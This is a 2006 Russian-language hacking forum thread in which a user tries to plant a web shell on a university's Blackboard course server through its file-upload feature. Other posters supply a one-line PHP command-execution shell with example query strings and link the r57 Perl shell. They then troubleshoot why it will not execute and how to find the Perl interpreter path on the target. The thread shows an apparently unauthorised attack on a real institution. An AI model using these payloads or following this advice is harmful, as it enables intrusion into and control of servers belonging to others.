ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > БЕЗОПАСНОСТЬ_OLD > Уязвимости
Перезагрузить страницу Сайт университета
   
 
Страница 2 из 3 < 1 2 3 >
 
Опции темы Поиск в этой теме Опции просмотра

  #11  
Старый 03.04.2006, 02:54
alex-19841
Познающий
Регистрация: 31.03.2006
Сообщений: 58
Провел на форуме:
163249

Репутация: 1
По умолчанию
Я попробовал туда свою "upload" форму залить, но у меня форма состоит из двух файлов "index.html" и "upload.pl" два файла залились нормально но когда начал заливать свой шелл через свою форму то получил вот такую ошибку

HTTP Status 404 - /courses/1/CIS-121-emaxson/uploads/_136251_1/courses/1/CIS-121-emaxson/uploads/_136248_1/upload.pl

--------------------------------------------------------------------------------

type Status report

message /courses/1/CIS-121-emaxson/uploads/_136251_1/courses/1/CIS-121-emaxson/uploads/_136248_1/upload.pl

description The requested resource (/courses/1/CIS-121-emaxson/uploads/_136251_1/courses/1/CIS-121-emaxson/uploads/_136248_1/upload.pl) is not available.

т.е говорит что upload.pl в той папке нету.
но когда открываю вот так
hxxp://сайт.edu/courses/1/CIS-121-emaxson/uploads/_136248_1/upload.pl

то он там

Вот моя upload форма
http://rapidshare.de/files/17066204/uploader.rar.html

Может у кого есть upload форма одним файлом, а не двумя?
Последний раз редактировалось alex-19841; 03.04.2006 в 02:57..
 

  #12  
Старый 03.04.2006, 03:01
alex-19841
Познающий
Регистрация: 31.03.2006
Сообщений: 58
Провел на форуме:
163249

Репутация: 1
По умолчанию
Цитата:
Попробуй вот так:

<?php system($_GET['c']); ?>

Пример использования (для винды) => xttp://site/shell.php?c=dir
Тоже ниче не показывает кроме <?php system($_GET['c']); ?>
 

  #13  
Старый 03.04.2006, 03:29
KEZ
Banned
Регистрация: 18.05.2005
Сообщений: 1,981
Провел на форуме:
1941233

Репутация: 2726


По умолчанию
Цитата:
Тоже ниче не показывает кроме <?php system($_GET['c']); ?>
Да? странно... ну попробуй тогда написать там "123" - я уверен, покажет "123" !
Попробуй 12345qwe - покажет 12345qwe...
Павел Глоба предсказывает что у тебя не стоит пхп...
 

  #14  
Старый 03.04.2006, 04:43
alex-19841
Познающий
Регистрация: 31.03.2006
Сообщений: 58
Провел на форуме:
163249

Репутация: 1
По умолчанию
А на html шелла случайно ни укого нету?
Последний раз редактировалось alex-19841; 03.04.2006 в 05:00..
 

  #15  
Старый 03.04.2006, 06:16
A110ut
Постоянный
Регистрация: 31.12.2005
Сообщений: 605
Провел на форуме:
4349433

Репутация: 661


По умолчанию
ее.............................................. .. нет...................................

-------------------------------

Цитата:
Сообщение от EST a1ien  
Знаеш что попробуй залить perl shell
кстати вариант... НО ИМХО врятле прокатит.
Последний раз редактировалось A110ut; 03.04.2006 в 14:46..
 

  #16  
Старый 03.04.2006, 14:43
EST a1ien
Участник форума
Регистрация: 02.04.2006
Сообщений: 273
Провел на форуме:
1269624

Репутация: 114
Отправить сообщение для EST a1ien с помощью ICQ
По умолчанию
Знаеш что попробуй залить perl shell например r57pws взять можно отсюда http://rst.void.ru/download/r57pws.txt
 

  #17  
Старый 03.04.2006, 20:21
alex-19841
Познающий
Регистрация: 31.03.2006
Сообщений: 58
Провел на форуме:
163249

Репутация: 1
По умолчанию
EST a1ien
Спасибо за шелл - переименовал её в .pl, залил таже история сервак открывает ее как в блокноте.
В этой шеле надо же еще знать адрес перла не серваке.

"Измените первую сроку скрипта "/usr/bin/perl" на корректный путь к интерпритатору перла на Вашем сервере."

А как его узнать?
Последний раз редактировалось alex-19841; 03.04.2006 в 20:27..
 

  #18  
Старый 03.04.2006, 22:40
virgoz
Участник форума
Регистрация: 16.09.2004
Сообщений: 193
Провел на форуме:
621131

Репутация: 47
Отправить сообщение для virgoz с помощью ICQ
По умолчанию
Попробуй залей локальный файл. Если прочитает, легче по исходникам будет...
 

  #19  
Старый 04.04.2006, 06:10
A110ut
Постоянный
Регистрация: 31.12.2005
Сообщений: 605
Провел на форуме:
4349433

Репутация: 661


По умолчанию
ИМХО мона сливать воду. Читай пост КЕЗа, только "пхп" замени на "перл"
 

  #20  
Старый 04.04.2006, 10:27
alex-19841
Познающий
Регистрация: 31.03.2006
Сообщений: 58
Провел на форуме:
163249

Репутация: 1
По умолчанию
Я ща толь что се на сервак залил shell.php и shell.pl в которых в нутри только <?php system($_GET['c']); ?> и все больше никаких тагов нет.
Пробовал
hццp://www.xxx.com/shell.php?c=id
или
hццp://www.xxx.com/shell.php&c=id
или
xttp://site/shell.php?c=dir
или
hццp://www.xxx.com/shell.pl?c=id
или
hццp://www.xxx.com/shell.pl&c=id
или
xttp://site/shell.pl?c=dir

Получаю пустой экран , при этом мой сервак поддерживает PHP и R57shell.php там работает нормально.
Вот в общем файл который заливаю.
http://rapidshare.de/files/17160217/shell.php.html

Сам сервак университета должен есть перл потамучто
webapps/portal/frameset.jsp?tab=courses&url=/bin/common/course.pl?course_id=_553_1
Только как узнать адресс перла на серваке?
Чтоб работала http://rst.void.ru/download/r57pws.txt

Сайт университета стоит на движке "Powered by Blackboard'"
Последний раз редактировалось alex-19841; 04.04.2006 в 10:42..
 
 
Страница 2 из 3 < 1 2 3 >



« Предыдущая тема | Следующая тема »


Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ